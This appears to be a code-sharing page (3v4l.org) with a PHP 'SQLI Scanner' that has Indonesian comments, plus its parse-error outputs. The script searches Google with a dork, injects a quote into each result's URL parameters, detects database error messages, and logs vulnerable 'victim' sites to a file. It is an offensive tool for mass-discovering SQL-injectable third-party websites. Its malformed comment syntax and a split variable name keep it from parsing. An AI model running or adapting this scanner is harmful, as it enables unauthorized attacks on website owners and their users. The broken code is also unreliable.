3v4l.org

run code in 150+ php & hhvm versions
Bugs & Features
<?php **/Membuat Dan menentukan error query :D**/ $error[] = 'You have an error in your SQL'; $error[] = 'supplied argument is not a valid MySQL result resource in'; $error[] = 'Division by zero in'; $error[] = 'Call to a member function'; $error[] = 'Microsoft JET Database'; $error[] = 'ODBC Microsoft Access Driver'; $error[] = 'Microsoft OLE DB Provider for SQL Server'; $error[] = 'Unclosed quotation mark'; $error[] = 'Microsoft OLE DB Provider for Oracle'; $error[] = 'Incorrect syntax near'; $error[] = 'SQL query failed'; **/note: pada variable $error[] kalian bisa menambahkan error string lagi sesuka hati kalian**/ **/Membuat Function Let it by (tampilkan berdasarkan a-z pada web victim)**/ function letItBy(){ ob_flush(); flush(); } **/membuat function scan*/ function scan($query, $page=1) { $resultPerPage=8; $start = $page*$resultPerPage; $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPer Page}&start={$start}&q=" . urlencode($query); $resultFromGoogle = json_decode( http_get($url, true) ,true); if(isset($resultFromGoogle['responseStatus'])) { if($resultFromGoogle['responseStatus'] != '200') return false; if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false; else return $resultFromGoogle['responseData']['results']; } else die('The function <b>' . __FUNCTION__ . '</b> Kill me <br>' . $url ); } **/membuat function http_get**/ function http_get($url, $safemode = false){ if($safemode === true) sleep(1); $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close(); } **/membuat function sqli**/ function sqli($url) { $data = http_get(str_replace("=", "='", $url)); $errors = implode("|", $GLOBALS['error']); return preg_match("#{$errors} #i", $data); } ?> <!--membuat halaman html dan form untuk submit--> <html> <head> <title>SQLI Scanner by ./dcp92</title> </head> <body> <center>please enter dork:<br> <form method="post" name="pageform" action="" onsubmit="return validate(this);"> <input type="text" size="25" id="dcp92" name="sqli" value="<?php echo (isset($_POST['sqli'] {0})) ? htmlentities($_POST['sqli']) : 'inurl:/page.php?id='; ?>" /> <input type="submit" value="Start Scanning"> </form> </center> </body> </html> <?php if(isset($_POST['sqli']{0})){ echo "Scanning has been started, please wait a few minutes"; for($googlePage = 1; $googlePage <= 10; $googlePage++){ $googleResult = scan($_POST['sqli'], $googlePage); **/menampilkan jika scan sudah selesai**/ if(!$googleResult){ echo '<font color="red">google say: I not have more result. so, scanning done</font> '; break; } for($victim = 0; $victim < sizeof($googleResult); $victim++){ **/menampilkan jika sukses**/ if(sqli($googleResult[$victim]['unescapedUrl'])){ file_put_contents("sqli.txt", "{$googleResult[$victim]['unescapedUrl']}\n"); } else { **/menampilkan jika gagal**/ echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult [$victim]['titleNoFormatting']}</a>\n"; letItBy(); } } } ?>
Output for hhvm-3.10.0

Process exited with code 153.
Output for 4.4.2 - 4.4.9, 5.1.0 - 5.4.34
Parse error: syntax error, unexpected '*' in /in/lC4FW on line 2
Process exited with code 255.
Output for 4.3.0 - 4.3.1, 4.3.5 - 4.4.1, 5.0.0 - 5.0.5
Parse error: parse error, unexpected '*' in /in/lC4FW on line 2
Process exited with code 255.
Output for 4.3.2 - 4.3.4
Parse error: parse error in /in/lC4FW on line 2
Process exited with code 255.